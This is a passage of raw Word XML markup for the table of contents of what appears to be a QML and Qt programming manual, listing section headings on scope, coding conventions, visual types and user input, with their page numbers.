          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>85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11" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Limitations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605211 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>85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12" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Implications for Application Security</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605212 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>85</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13" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Scope and Naming Resolution</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605213 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>86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14" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript Scope</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605214 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>86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15" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Type Names and Imported JavaScript Files</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605215 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>87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16" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Binding Scope Object</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605216 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>87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17" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Component Scope</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605217 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>88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18" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Component Instance Hierarchy</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605218 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>89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19" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Overridden Properties</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605219 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>91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20" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript Global Object</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605220 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>92</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21" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Coding Conventions</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605221 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>92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22" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Object Declarations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605222 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>92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23" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Grouped Properties</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605223 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>93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24" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Lists</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605224 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>94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25" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript Code</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605225 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>94</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26" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Glossary Of QML Terms</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605226 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>95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27" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Common Terms</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605227 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>95</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28" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Use Case - Visual Elements In QML</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605228 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>98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29" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>The Rectangle Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605229 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>98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30" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>The Image Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605230 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>99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31" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Shared Visual Properties</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605231 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>99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232" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Opacity and Visibility</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605232 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>99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233" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Transforms</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605233 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>101</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34" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Use Case - Responding To User Input in QML</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605234 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>102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35" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Supported Types of User Input</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605235 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>102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236" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Mouse and Touch Events</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605236 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
